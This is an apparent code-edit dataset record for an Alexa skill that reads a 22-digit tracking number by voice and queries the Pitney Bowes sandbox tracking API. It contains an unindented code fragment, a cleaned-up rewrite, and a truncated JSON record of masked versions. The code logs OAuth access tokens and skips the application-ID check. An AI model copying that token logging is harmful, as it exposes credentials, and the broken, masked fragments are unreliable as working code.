tracking_number_14 = intent['slots']['Fourteen']['value']
tracking_number_15 = intent['slots']['Fifteen']['value']
tracking_number_16 = intent['slots']['Sixteen']['value']
tracking_number_17 = intent['slots']['Seventeen']['value']
tracking_number_18 = intent['slots']['Eighteen']['value']
tracking_number_19 = intent['slots']['Nineteen']['value']
tracking_number_20 = intent['slots']['Twenty']['value']
tracking_number_21 = intent['slots']['TwentyOne']['value']
tracking_number_22 = intent['slots']['TwentyTwo']['value']
tracking_number = '%s%s%s%s%s%s%s%s%s%s%s%s' % (tracking_number_11,
tracking_number_12, tracking_number_13, tracking_number_14,
tracking_number_15, tracking_number_16, tracking_number_17,
tracking_number_18, tracking_number_19, tracking_number_20,
tracking_number_21, tracking_number_22)
print("'first_ten' not in session['attributes']--->")
print('first_ten' not in session['attributes'])
full_tracking_number = '%s%s' % (session['attributes']['first_ten'],
tracking_number)
bearer = 'Bearer %s' % session['access_token']
print('USPS FULL Tracking Number ----> %s' % full_tracking_number)
url = (
'https://api-sandbox.pitneybowes.com/shippingservices/v1/tracking/%s?packageIdentifierType=TrackingNumber&carrier=USPS'
% full_tracking_number)
r = requests.get(url, headers={'Authorization': bearer})
tracking_response = {}
tracking_response = json.loads(r.content)
if r.status_code == 200:
speech_output = 'The status of the parcel is ' + tracking_response[
'status']
reprompt_text = 'The status of the parcel is ' + tracking_response[
'status']
else:
speech_output = tracking_response['errors'][0]['errorDescription']
reprompt_text = tracking_response['errors'][0]['errorDescription']
print(r.content)
except Exception as app_exception:
traceback.print_tb
should_end_session = False
if ('attributes' not in session or 'attributes' in session and
'first_ten' not in session['attributes']):
speech_output = (
'Please provide only first ten digits of the tracking number')
reprompt_text = (
'Please provide only first ten digits of the tracking number')
else:
speech_output = (
'There was some problem, Please say remaining digits of the tracking number'
)
reprompt_text = (
'Please say remaining digits of the tracking number')
return build_response(session_attributes, build_speechlet_response(
intent['name'], speech_output, reprompt_text, should_end_session))
def on_session_started(session_started_request, session):
""" Called when the session starts """
print('on_session_started requestId=' + session_started_request[
'requestId'] + ', sessionId=' + session['sessionId'])
def on_launch(launch_request, session):
""" Called when the user launches the skill without specifying what they
want
"""
print('on_launch requestId=' + launch_request['requestId'] +
', sessionId=' + session['sessionId'])
return get_welcome_response()
def oauth_request(session):
access_key = os.environ['key']
access_key_value = 'Basic ' + access_key
url = 'https://api-sandbox.pitneybowes.com/oauth/token'
r = requests.post(url, headers={'Authorization': access_key_value,
'Content-Type': 'application/x-www-form-urlencoded'}, data={
'grant_type': 'client_credentials'})
print(r.status_code)
if r.status_code == 200:
j = json.loads(r.content)
print(j)
session['access_token'] = j['access_token']
def on_intent(intent_request, session):
""" Called when the user specifies an intent for this skill """
print('on_intent requestId=' + intent_request['requestId'] +
', sessionId=' + session['sessionId'])
intent = intent_request['intent']
intent_name = intent_request['intent']['name']
if 'access_token' not in session:
oauth_request(session)
print(session['access_token'])
if intent_name == 'Tracking':
return setFirstEleven(intent, session)
elif intent_name == 'TrackingSecond':
return getParcelStatus(intent, session)
elif intent_name == 'AMAZON.HelpIntent':
return get_welcome_response()
elif intent_name == 'AMAZON.CancelIntent' or intent_name == 'AMAZON.StopIntent':
return handle_session_end_request()
else:
raise ValueError('Invalid intent')
def on_session_ended(session_ended_request, session):
""" Called when the user ends the session.
Is not called when the skill returns should_end_session=true
"""
print('on_session_ended requestId=' + session_ended_request['requestId'
] + ', sessionId=' + session['sessionId'])
def lambda_handler(event, context):
""" Route the incoming request based on type (LaunchRequest, IntentRequest,
etc.) The JSON body of the request is provided in the event parameter.
"""
print('event.session.application.applicationId=' + event['session'][
'application']['applicationId'])
"""
Uncomment this if statement and populate with your skill's application ID to
prevent someone else from configuring a skill that sends requests to this
function.
"""
if event['session']['new']:
on_session_started({'requestId': event['request']['requestId']},
event['session'])
if event['request']['type'] == 'LaunchRequest':
return on_launch(event['request'], event['session'])
elif event['request']['type'] == 'IntentRequest':
return on_intent(event['request'], event['session'])
elif event['request']['type'] == 'SessionEndedRequest':
return on_session_ended(event['request'], event['session'])
<|reserved_special_token_1|>
"""
Code for Alexa skill to check PB tracking
"""
from __future__ import print_function
import traceback
import requests
import os
import json
# --------------- Helpers that build all of the responses ----------------------
def build_speechlet_response(title, output, reprompt_text, should_end_session):
return {
'outputSpeech': {
'type': 'PlainText',
'text': output
},
'card': {
'type': 'Simple',
'title': "SessionSpeechlet - " + title,
'content': "SessionSpeechlet - " + output
},
'reprompt': {
'outputSpeech': {
'type': 'PlainText',
'text': reprompt_text
}
},
'shouldEndSession': should_end_session
}
def build_response(session_attributes, speechlet_response):
return {
'version': '1.0',
'sessionAttributes': session_attributes,
'response': speechlet_response
}
# --------------- Functions that control the skill's behavior ------------------
def get_welcome_response():
""" If we wanted to initialize the session to have some attributes we could
add those here
"""
session_attributes = {}
card_title = "Welcome to PB Parcel Tracker"
speech_output = "Please give first 10 digits of tracking number"
# If the user either does not reply to the welcome message or says something
# that is not understood, they will be prompted again with this text.
reprompt_text = "Please give first 10 digits of tracking number"
should_end_session = False
return build_response(session_attributes, build_speechlet_response(
card_title, speech_output, reprompt_text, should_end_session))
def handle_session_end_request():
card_title = "Session Ended"
speech_output = "Thank you for trying the Alexa Skills Kit sample. " \
"Have a nice day! "
# Setting this to true ends the session and exits the skill.
should_end_session = True
return build_response({}, build_speechlet_response(
card_title, speech_output, None, should_end_session))
#----- get tracking ------
def setFirstEleven(intent, session):
    """Collect the first ten digits of the tracking number from the intent.

    Reads slots 'One'..'Ten', concatenates their values, and stores the
    result in the returned session attributes under 'first_ten' so the
    follow-up intent (getParcelStatus) can complete the number. On any
    missing/invalid slot, re-prompts the user for the first ten digits.

    NOTE(review): the name says "Eleven" but only ten slots are read here;
    the remaining twelve digits are handled by getParcelStatus.
    """
    session_attributes = {}
    should_end_session = False
    speech_output = "Now give remaining digits"
    reprompt_text = "Now give the next eleven numbers"
    try:
        slot_names = ('One', 'Two', 'Three', 'Four', 'Five',
                      'Six', 'Seven', 'Eight', 'Nine', 'Ten')
        first_ten = ''.join(
            str(intent['slots'][name]['value']) for name in slot_names)
        session_attributes['first_ten'] = first_ten
        print("session after adding first ten--->")
        print(session_attributes)
    except Exception:
        # Bug fix: the original referenced traceback.print_tb without
        # calling it, so the traceback was silently dropped. print_exc()
        # actually logs the active exception.
        traceback.print_exc()
        speech_output = "There was some problem, Please provide first ten digits of the tracking number"
        reprompt_text = "Please say first ten digits of the tracking number"
    return build_response(session_attributes, build_speechlet_response(
        intent['name'], speech_output, reprompt_text, should_end_session))
#----- get tracking ------
def getParcelStatus(intent, session):
    """Complete the tracking number and query PB tracking for its status.

    Reads slots 'Eleven'..'TwentyTwo' (the remaining twelve digits),
    prepends the ten digits stored in session['attributes']['first_ten'],
    then calls the Pitney Bowes sandbox tracking API using the OAuth token
    stashed in session['access_token']. On success, speaks the parcel
    status; on an API error, speaks the API's error description. On any
    local failure, re-prompts for whichever digits are still missing.
    """
    session_attributes = {}
    should_end_session = True
    speech_output = "There was some problem in taking your input"
    reprompt_text = "Please say remaining digits of the tracking number"
    try:
        slot_names = ('Eleven', 'Twelve', 'Thirteen', 'Fourteen', 'Fifteen',
                      'Sixteen', 'Seventeen', 'Eighteen', 'Nineteen',
                      'Twenty', 'TwentyOne', 'TwentyTwo')
        tracking_number = ''.join(
            str(intent['slots'][name]['value']) for name in slot_names)
        print("'first_ten' not in session['attributes']--->")
        print('first_ten' not in session['attributes'])
        full_tracking_number = "%s%s" % (session['attributes']['first_ten'], tracking_number)
        bearer = "Bearer %s" % (session['access_token'])
        print("USPS FULL Tracking Number ----> %s" % (full_tracking_number))
        url = "https://api-sandbox.pitneybowes.com/shippingservices/v1/tracking/%s?packageIdentifierType=TrackingNumber&carrier=USPS" % (full_tracking_number)
        r = requests.get(url, headers={"Authorization": bearer})
        tracking_response = json.loads(r.content)
        if r.status_code == 200:
            speech_output = "The status of the parcel is " + tracking_response['status']
            reprompt_text = "The status of the parcel is " + tracking_response['status']
        else:
            speech_output = tracking_response['errors'][0]['errorDescription']
            reprompt_text = tracking_response['errors'][0]['errorDescription']
        print(r.content)
    except Exception:
        # Bug fix: the original referenced traceback.print_tb without
        # calling it, so the traceback was silently dropped. print_exc()
        # actually logs the active exception.
        traceback.print_exc()
        should_end_session = False
        # If the first ten digits were never captured, ask for those first;
        # otherwise re-ask only for the remaining digits.
        if 'first_ten' not in session.get('attributes', {}):
            speech_output = "Please provide only first ten digits of the tracking number"
            reprompt_text = "Please provide only first ten digits of the tracking number"
        else:
            speech_output = "There was some problem, Please say remaining digits of the tracking number"
            reprompt_text = "Please say remaining digits of the tracking number"
    return build_response(session_attributes, build_speechlet_response(
        intent['name'], speech_output, reprompt_text, should_end_session))
# --------------- Events ------------------
def on_session_started(session_started_request, session):
    """Log the start of a new skill session."""
    request_id = session_started_request['requestId']
    session_id = session['sessionId']
    print("on_session_started requestId=" + request_id
          + ", sessionId=" + session_id)
def on_launch(launch_request, session):
    """Handle a launch with no specific intent: return the welcome prompt."""
    request_id = launch_request['requestId']
    session_id = session['sessionId']
    print("on_launch requestId=" + request_id + ", sessionId=" + session_id)
    # Dispatch to the skill's launch behavior.
    return get_welcome_response()
def oauth_request(session):
    """Fetch an OAuth token from the PB sandbox and stash it in the session.

    The Basic-auth client credential is read from the 'key' environment
    variable. On success the token is stored under session['access_token'];
    on failure nothing is stored, which previously produced a later
    KeyError in on_intent with no diagnostic -- the failure is now logged.
    """
    access_key = os.environ['key']
    access_key_value = "Basic " + access_key
    url = 'https://api-sandbox.pitneybowes.com/oauth/token'
    r = requests.post(url, headers={"Authorization": access_key_value,
                                    "Content-Type": "application/x-www-form-urlencoded"},
                      data={"grant_type": "client_credentials"})
    print(r.status_code)
    if r.status_code == 200:
        j = json.loads(r.content)
        # NOTE(review): printing the full token response logs a secret;
        # consider removing this in production.
        print(j)
        session['access_token'] = j['access_token']
    else:
        # Bug fix: a failed token request was silently ignored, leaving
        # 'access_token' unset and crashing callers later. Log the body
        # so the failure is diagnosable.
        print("OAuth token request failed: %s" % r.content)
def on_intent(intent_request, session):
    """Route an IntentRequest to the handler matching its intent name."""
    print("on_intent requestId=" + intent_request['requestId'] +
          ", sessionId=" + session['sessionId'])
    intent = intent_request['intent']
    intent_name = intent['name']
    # Lazily obtain an OAuth token the first time an intent arrives.
    if 'access_token' not in session:
        oauth_request(session)
    print(session['access_token'])
    # Dispatch to the skill's intent handlers.
    if intent_name == "Tracking":
        return setFirstEleven(intent, session)
    if intent_name == "TrackingSecond":
        return getParcelStatus(intent, session)
    if intent_name == "AMAZON.HelpIntent":
        return get_welcome_response()
    if intent_name in ("AMAZON.CancelIntent", "AMAZON.StopIntent"):
        return handle_session_end_request()
    raise ValueError("Invalid intent")
def on_session_ended(session_ended_request, session):
    """Log the end of a session.

    Not called when the skill itself returns should_end_session=true.
    Cleanup logic, if any, belongs here.
    """
    log_line = ("on_session_ended requestId=" +
                session_ended_request['requestId'] +
                ", sessionId=" + session['sessionId'])
    print(log_line)
# --------------- Main handler ------------------
def lambda_handler(event, context):
    """Lambda entry point: route the incoming Alexa request by its type.

    The JSON body of the request is provided in the event parameter;
    context is the standard Lambda context (unused).
    """
    print("event.session.application.applicationId=" +
          event['session']['application']['applicationId'])
    # NOTE: to prevent other skills from invoking this function, compare
    # event['session']['application']['applicationId'] against this
    # skill's application ID and raise ValueError on mismatch.
    session = event['session']
    request = event['request']
    if session['new']:
        on_session_started({'requestId': request['requestId']}, session)
    request_type = request['type']
    if request_type == "LaunchRequest":
        return on_launch(request, session)
    if request_type == "IntentRequest":
        return on_intent(request, session)
    if request_type == "SessionEndedRequest":
        return on_session_ended(request, session)
|
flexible
|
{
"blob_id": "a5ef2adbf85b5ab80c59697340f94bc57d60952e",
"index": 4463,
"step-1": "<mask token>\n\n\ndef build_response(session_attributes, speechlet_response):\n return {'version': '1.0', 'sessionAttributes': session_attributes,\n 'response': speechlet_response}\n\n\ndef get_welcome_response():\n \"\"\" If we wanted to initialize the session to have some attributes we could\n add those here\n \"\"\"\n session_attributes = {}\n card_title = 'Welcome to PB Parcel Tracker'\n speech_output = 'Please give first 10 digits of tracking number'\n reprompt_text = 'Please give first 10 digits of tracking number'\n should_end_session = False\n return build_response(session_attributes, build_speechlet_response(\n card_title, speech_output, reprompt_text, should_end_session))\n\n\ndef handle_session_end_request():\n card_title = 'Session Ended'\n speech_output = (\n 'Thank you for trying the Alexa Skills Kit sample. Have a nice day! ')\n should_end_session = True\n return build_response({}, build_speechlet_response(card_title,\n speech_output, None, should_end_session))\n\n\n<mask token>\n\n\ndef on_session_started(session_started_request, session):\n \"\"\" Called when the session starts \"\"\"\n print('on_session_started requestId=' + session_started_request[\n 'requestId'] + ', sessionId=' + session['sessionId'])\n\n\ndef on_launch(launch_request, session):\n \"\"\" Called when the user launches the skill without specifying what they\n want\n \"\"\"\n print('on_launch requestId=' + launch_request['requestId'] +\n ', sessionId=' + session['sessionId'])\n return get_welcome_response()\n\n\ndef oauth_request(session):\n access_key = os.environ['key']\n access_key_value = 'Basic ' + access_key\n url = 'https://api-sandbox.pitneybowes.com/oauth/token'\n r = requests.post(url, headers={'Authorization': access_key_value,\n 'Content-Type': 'application/x-www-form-urlencoded'}, data={\n 'grant_type': 'client_credentials'})\n print(r.status_code)\n if r.status_code == 200:\n j = json.loads(r.content)\n print(j)\n session['access_token'] = 
j['access_token']\n\n\ndef on_intent(intent_request, session):\n \"\"\" Called when the user specifies an intent for this skill \"\"\"\n print('on_intent requestId=' + intent_request['requestId'] +\n ', sessionId=' + session['sessionId'])\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n if 'access_token' not in session:\n oauth_request(session)\n print(session['access_token'])\n if intent_name == 'Tracking':\n return setFirstEleven(intent, session)\n elif intent_name == 'TrackingSecond':\n return getParcelStatus(intent, session)\n elif intent_name == 'AMAZON.HelpIntent':\n return get_welcome_response()\n elif intent_name == 'AMAZON.CancelIntent' or intent_name == 'AMAZON.StopIntent':\n return handle_session_end_request()\n else:\n raise ValueError('Invalid intent')\n\n\ndef on_session_ended(session_ended_request, session):\n \"\"\" Called when the user ends the session.\n\n Is not called when the skill returns should_end_session=true\n \"\"\"\n print('on_session_ended requestId=' + session_ended_request['requestId'\n ] + ', sessionId=' + session['sessionId'])\n\n\ndef lambda_handler(event, context):\n \"\"\" Route the incoming request based on type (LaunchRequest, IntentRequest,\n etc.) 
The JSON body of the request is provided in the event parameter.\n \"\"\"\n print('event.session.application.applicationId=' + event['session'][\n 'application']['applicationId'])\n \"\"\"\n Uncomment this if statement and populate with your skill's application ID to\n prevent someone else from configuring a skill that sends requests to this\n function.\n \"\"\"\n if event['session']['new']:\n on_session_started({'requestId': event['request']['requestId']},\n event['session'])\n if event['request']['type'] == 'LaunchRequest':\n return on_launch(event['request'], event['session'])\n elif event['request']['type'] == 'IntentRequest':\n return on_intent(event['request'], event['session'])\n elif event['request']['type'] == 'SessionEndedRequest':\n return on_session_ended(event['request'], event['session'])\n",
"step-2": "<mask token>\n\n\ndef build_response(session_attributes, speechlet_response):\n return {'version': '1.0', 'sessionAttributes': session_attributes,\n 'response': speechlet_response}\n\n\ndef get_welcome_response():\n \"\"\" If we wanted to initialize the session to have some attributes we could\n add those here\n \"\"\"\n session_attributes = {}\n card_title = 'Welcome to PB Parcel Tracker'\n speech_output = 'Please give first 10 digits of tracking number'\n reprompt_text = 'Please give first 10 digits of tracking number'\n should_end_session = False\n return build_response(session_attributes, build_speechlet_response(\n card_title, speech_output, reprompt_text, should_end_session))\n\n\ndef handle_session_end_request():\n card_title = 'Session Ended'\n speech_output = (\n 'Thank you for trying the Alexa Skills Kit sample. Have a nice day! ')\n should_end_session = True\n return build_response({}, build_speechlet_response(card_title,\n speech_output, None, should_end_session))\n\n\n<mask token>\n\n\ndef getParcelStatus(intent, session):\n session_attributes = {}\n should_end_session = True\n speech_output = 'There was some problem in taking your input'\n reprompt_text = 'Please say remaining digits of the tracking number'\n try:\n tracking_number_11 = intent['slots']['Eleven']['value']\n tracking_number_12 = intent['slots']['Twelve']['value']\n tracking_number_13 = intent['slots']['Thirteen']['value']\n tracking_number_14 = intent['slots']['Fourteen']['value']\n tracking_number_15 = intent['slots']['Fifteen']['value']\n tracking_number_16 = intent['slots']['Sixteen']['value']\n tracking_number_17 = intent['slots']['Seventeen']['value']\n tracking_number_18 = intent['slots']['Eighteen']['value']\n tracking_number_19 = intent['slots']['Nineteen']['value']\n tracking_number_20 = intent['slots']['Twenty']['value']\n tracking_number_21 = intent['slots']['TwentyOne']['value']\n tracking_number_22 = intent['slots']['TwentyTwo']['value']\n tracking_number = 
'%s%s%s%s%s%s%s%s%s%s%s%s' % (tracking_number_11,\n tracking_number_12, tracking_number_13, tracking_number_14,\n tracking_number_15, tracking_number_16, tracking_number_17,\n tracking_number_18, tracking_number_19, tracking_number_20,\n tracking_number_21, tracking_number_22)\n print(\"'first_ten' not in session['attributes']--->\")\n print('first_ten' not in session['attributes'])\n full_tracking_number = '%s%s' % (session['attributes']['first_ten'],\n tracking_number)\n bearer = 'Bearer %s' % session['access_token']\n print('USPS FULL Tracking Number ----> %s' % full_tracking_number)\n url = (\n 'https://api-sandbox.pitneybowes.com/shippingservices/v1/tracking/%s?packageIdentifierType=TrackingNumber&carrier=USPS'\n % full_tracking_number)\n r = requests.get(url, headers={'Authorization': bearer})\n tracking_response = {}\n tracking_response = json.loads(r.content)\n if r.status_code == 200:\n speech_output = 'The status of the parcel is ' + tracking_response[\n 'status']\n reprompt_text = 'The status of the parcel is ' + tracking_response[\n 'status']\n else:\n speech_output = tracking_response['errors'][0]['errorDescription']\n reprompt_text = tracking_response['errors'][0]['errorDescription']\n print(r.content)\n except Exception as app_exception:\n traceback.print_tb\n should_end_session = False\n if ('attributes' not in session or 'attributes' in session and \n 'first_ten' not in session['attributes']):\n speech_output = (\n 'Please provide only first ten digits of the tracking number')\n reprompt_text = (\n 'Please provide only first ten digits of the tracking number')\n else:\n speech_output = (\n 'There was some problem, Please say remaining digits of the tracking number'\n )\n reprompt_text = (\n 'Please say remaining digits of the tracking number')\n return build_response(session_attributes, build_speechlet_response(\n intent['name'], speech_output, reprompt_text, should_end_session))\n\n\ndef on_session_started(session_started_request, session):\n 
\"\"\" Called when the session starts \"\"\"\n print('on_session_started requestId=' + session_started_request[\n 'requestId'] + ', sessionId=' + session['sessionId'])\n\n\ndef on_launch(launch_request, session):\n \"\"\" Called when the user launches the skill without specifying what they\n want\n \"\"\"\n print('on_launch requestId=' + launch_request['requestId'] +\n ', sessionId=' + session['sessionId'])\n return get_welcome_response()\n\n\ndef oauth_request(session):\n access_key = os.environ['key']\n access_key_value = 'Basic ' + access_key\n url = 'https://api-sandbox.pitneybowes.com/oauth/token'\n r = requests.post(url, headers={'Authorization': access_key_value,\n 'Content-Type': 'application/x-www-form-urlencoded'}, data={\n 'grant_type': 'client_credentials'})\n print(r.status_code)\n if r.status_code == 200:\n j = json.loads(r.content)\n print(j)\n session['access_token'] = j['access_token']\n\n\ndef on_intent(intent_request, session):\n \"\"\" Called when the user specifies an intent for this skill \"\"\"\n print('on_intent requestId=' + intent_request['requestId'] +\n ', sessionId=' + session['sessionId'])\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n if 'access_token' not in session:\n oauth_request(session)\n print(session['access_token'])\n if intent_name == 'Tracking':\n return setFirstEleven(intent, session)\n elif intent_name == 'TrackingSecond':\n return getParcelStatus(intent, session)\n elif intent_name == 'AMAZON.HelpIntent':\n return get_welcome_response()\n elif intent_name == 'AMAZON.CancelIntent' or intent_name == 'AMAZON.StopIntent':\n return handle_session_end_request()\n else:\n raise ValueError('Invalid intent')\n\n\ndef on_session_ended(session_ended_request, session):\n \"\"\" Called when the user ends the session.\n\n Is not called when the skill returns should_end_session=true\n \"\"\"\n print('on_session_ended requestId=' + session_ended_request['requestId'\n ] + ', sessionId=' + 
session['sessionId'])\n\n\ndef lambda_handler(event, context):\n \"\"\" Route the incoming request based on type (LaunchRequest, IntentRequest,\n etc.) The JSON body of the request is provided in the event parameter.\n \"\"\"\n print('event.session.application.applicationId=' + event['session'][\n 'application']['applicationId'])\n \"\"\"\n Uncomment this if statement and populate with your skill's application ID to\n prevent someone else from configuring a skill that sends requests to this\n function.\n \"\"\"\n if event['session']['new']:\n on_session_started({'requestId': event['request']['requestId']},\n event['session'])\n if event['request']['type'] == 'LaunchRequest':\n return on_launch(event['request'], event['session'])\n elif event['request']['type'] == 'IntentRequest':\n return on_intent(event['request'], event['session'])\n elif event['request']['type'] == 'SessionEndedRequest':\n return on_session_ended(event['request'], event['session'])\n",
"step-3": "<mask token>\n\n\ndef build_speechlet_response(title, output, reprompt_text, should_end_session):\n return {'outputSpeech': {'type': 'PlainText', 'text': output}, 'card':\n {'type': 'Simple', 'title': 'SessionSpeechlet - ' + title,\n 'content': 'SessionSpeechlet - ' + output}, 'reprompt': {\n 'outputSpeech': {'type': 'PlainText', 'text': reprompt_text}},\n 'shouldEndSession': should_end_session}\n\n\ndef build_response(session_attributes, speechlet_response):\n return {'version': '1.0', 'sessionAttributes': session_attributes,\n 'response': speechlet_response}\n\n\ndef get_welcome_response():\n \"\"\" If we wanted to initialize the session to have some attributes we could\n add those here\n \"\"\"\n session_attributes = {}\n card_title = 'Welcome to PB Parcel Tracker'\n speech_output = 'Please give first 10 digits of tracking number'\n reprompt_text = 'Please give first 10 digits of tracking number'\n should_end_session = False\n return build_response(session_attributes, build_speechlet_response(\n card_title, speech_output, reprompt_text, should_end_session))\n\n\ndef handle_session_end_request():\n card_title = 'Session Ended'\n speech_output = (\n 'Thank you for trying the Alexa Skills Kit sample. Have a nice day! 
')\n should_end_session = True\n return build_response({}, build_speechlet_response(card_title,\n speech_output, None, should_end_session))\n\n\ndef setFirstEleven(intent, session):\n session_attributes = {}\n should_end_session = False\n speech_output = 'Now give remaining digits'\n reprompt_text = 'Now give the next eleven numbers'\n try:\n tracking_number_1 = intent['slots']['One']['value']\n tracking_number_2 = intent['slots']['Two']['value']\n tracking_number_3 = intent['slots']['Three']['value']\n tracking_number_4 = intent['slots']['Four']['value']\n tracking_number_5 = intent['slots']['Five']['value']\n tracking_number_6 = intent['slots']['Six']['value']\n tracking_number_7 = intent['slots']['Seven']['value']\n tracking_number_8 = intent['slots']['Eight']['value']\n tracking_number_9 = intent['slots']['Nine']['value']\n tracking_number_10 = intent['slots']['Ten']['value']\n first_ten = '%s%s%s%s%s%s%s%s%s%s' % (tracking_number_1,\n tracking_number_2, tracking_number_3, tracking_number_4,\n tracking_number_5, tracking_number_6, tracking_number_7,\n tracking_number_8, tracking_number_9, tracking_number_10)\n session_attributes['first_ten'] = first_ten\n print('session after adding first ten--->')\n print(session_attributes)\n except Exception as app_exception:\n traceback.print_tb\n speech_output = (\n 'There was some problem, Please provide first ten digits of the tracking number'\n )\n reprompt_text = 'Please say first ten digits of the tracking number'\n return build_response(session_attributes, build_speechlet_response(\n intent['name'], speech_output, reprompt_text, should_end_session))\n\n\ndef getParcelStatus(intent, session):\n session_attributes = {}\n should_end_session = True\n speech_output = 'There was some problem in taking your input'\n reprompt_text = 'Please say remaining digits of the tracking number'\n try:\n tracking_number_11 = intent['slots']['Eleven']['value']\n tracking_number_12 = intent['slots']['Twelve']['value']\n 
tracking_number_13 = intent['slots']['Thirteen']['value']\n tracking_number_14 = intent['slots']['Fourteen']['value']\n tracking_number_15 = intent['slots']['Fifteen']['value']\n tracking_number_16 = intent['slots']['Sixteen']['value']\n tracking_number_17 = intent['slots']['Seventeen']['value']\n tracking_number_18 = intent['slots']['Eighteen']['value']\n tracking_number_19 = intent['slots']['Nineteen']['value']\n tracking_number_20 = intent['slots']['Twenty']['value']\n tracking_number_21 = intent['slots']['TwentyOne']['value']\n tracking_number_22 = intent['slots']['TwentyTwo']['value']\n tracking_number = '%s%s%s%s%s%s%s%s%s%s%s%s' % (tracking_number_11,\n tracking_number_12, tracking_number_13, tracking_number_14,\n tracking_number_15, tracking_number_16, tracking_number_17,\n tracking_number_18, tracking_number_19, tracking_number_20,\n tracking_number_21, tracking_number_22)\n print(\"'first_ten' not in session['attributes']--->\")\n print('first_ten' not in session['attributes'])\n full_tracking_number = '%s%s' % (session['attributes']['first_ten'],\n tracking_number)\n bearer = 'Bearer %s' % session['access_token']\n print('USPS FULL Tracking Number ----> %s' % full_tracking_number)\n url = (\n 'https://api-sandbox.pitneybowes.com/shippingservices/v1/tracking/%s?packageIdentifierType=TrackingNumber&carrier=USPS'\n % full_tracking_number)\n r = requests.get(url, headers={'Authorization': bearer})\n tracking_response = {}\n tracking_response = json.loads(r.content)\n if r.status_code == 200:\n speech_output = 'The status of the parcel is ' + tracking_response[\n 'status']\n reprompt_text = 'The status of the parcel is ' + tracking_response[\n 'status']\n else:\n speech_output = tracking_response['errors'][0]['errorDescription']\n reprompt_text = tracking_response['errors'][0]['errorDescription']\n print(r.content)\n except Exception as app_exception:\n traceback.print_tb\n should_end_session = False\n if ('attributes' not in session or 'attributes' in 
session and \n 'first_ten' not in session['attributes']):\n speech_output = (\n 'Please provide only first ten digits of the tracking number')\n reprompt_text = (\n 'Please provide only first ten digits of the tracking number')\n else:\n speech_output = (\n 'There was some problem, Please say remaining digits of the tracking number'\n )\n reprompt_text = (\n 'Please say remaining digits of the tracking number')\n return build_response(session_attributes, build_speechlet_response(\n intent['name'], speech_output, reprompt_text, should_end_session))\n\n\ndef on_session_started(session_started_request, session):\n \"\"\" Called when the session starts \"\"\"\n print('on_session_started requestId=' + session_started_request[\n 'requestId'] + ', sessionId=' + session['sessionId'])\n\n\ndef on_launch(launch_request, session):\n \"\"\" Called when the user launches the skill without specifying what they\n want\n \"\"\"\n print('on_launch requestId=' + launch_request['requestId'] +\n ', sessionId=' + session['sessionId'])\n return get_welcome_response()\n\n\ndef oauth_request(session):\n access_key = os.environ['key']\n access_key_value = 'Basic ' + access_key\n url = 'https://api-sandbox.pitneybowes.com/oauth/token'\n r = requests.post(url, headers={'Authorization': access_key_value,\n 'Content-Type': 'application/x-www-form-urlencoded'}, data={\n 'grant_type': 'client_credentials'})\n print(r.status_code)\n if r.status_code == 200:\n j = json.loads(r.content)\n print(j)\n session['access_token'] = j['access_token']\n\n\ndef on_intent(intent_request, session):\n \"\"\" Called when the user specifies an intent for this skill \"\"\"\n print('on_intent requestId=' + intent_request['requestId'] +\n ', sessionId=' + session['sessionId'])\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n if 'access_token' not in session:\n oauth_request(session)\n print(session['access_token'])\n if intent_name == 'Tracking':\n return setFirstEleven(intent, 
session)\n elif intent_name == 'TrackingSecond':\n return getParcelStatus(intent, session)\n elif intent_name == 'AMAZON.HelpIntent':\n return get_welcome_response()\n elif intent_name == 'AMAZON.CancelIntent' or intent_name == 'AMAZON.StopIntent':\n return handle_session_end_request()\n else:\n raise ValueError('Invalid intent')\n\n\ndef on_session_ended(session_ended_request, session):\n \"\"\" Called when the user ends the session.\n\n Is not called when the skill returns should_end_session=true\n \"\"\"\n print('on_session_ended requestId=' + session_ended_request['requestId'\n ] + ', sessionId=' + session['sessionId'])\n\n\ndef lambda_handler(event, context):\n \"\"\" Route the incoming request based on type (LaunchRequest, IntentRequest,\n etc.) The JSON body of the request is provided in the event parameter.\n \"\"\"\n print('event.session.application.applicationId=' + event['session'][\n 'application']['applicationId'])\n \"\"\"\n Uncomment this if statement and populate with your skill's application ID to\n prevent someone else from configuring a skill that sends requests to this\n function.\n \"\"\"\n if event['session']['new']:\n on_session_started({'requestId': event['request']['requestId']},\n event['session'])\n if event['request']['type'] == 'LaunchRequest':\n return on_launch(event['request'], event['session'])\n elif event['request']['type'] == 'IntentRequest':\n return on_intent(event['request'], event['session'])\n elif event['request']['type'] == 'SessionEndedRequest':\n return on_session_ended(event['request'], event['session'])\n",
"step-4": "<mask token>\nfrom __future__ import print_function\nimport traceback\nimport requests\nimport os\nimport json\n\n\ndef build_speechlet_response(title, output, reprompt_text, should_end_session):\n return {'outputSpeech': {'type': 'PlainText', 'text': output}, 'card':\n {'type': 'Simple', 'title': 'SessionSpeechlet - ' + title,\n 'content': 'SessionSpeechlet - ' + output}, 'reprompt': {\n 'outputSpeech': {'type': 'PlainText', 'text': reprompt_text}},\n 'shouldEndSession': should_end_session}\n\n\ndef build_response(session_attributes, speechlet_response):\n return {'version': '1.0', 'sessionAttributes': session_attributes,\n 'response': speechlet_response}\n\n\ndef get_welcome_response():\n \"\"\" If we wanted to initialize the session to have some attributes we could\n add those here\n \"\"\"\n session_attributes = {}\n card_title = 'Welcome to PB Parcel Tracker'\n speech_output = 'Please give first 10 digits of tracking number'\n reprompt_text = 'Please give first 10 digits of tracking number'\n should_end_session = False\n return build_response(session_attributes, build_speechlet_response(\n card_title, speech_output, reprompt_text, should_end_session))\n\n\ndef handle_session_end_request():\n card_title = 'Session Ended'\n speech_output = (\n 'Thank you for trying the Alexa Skills Kit sample. Have a nice day! 
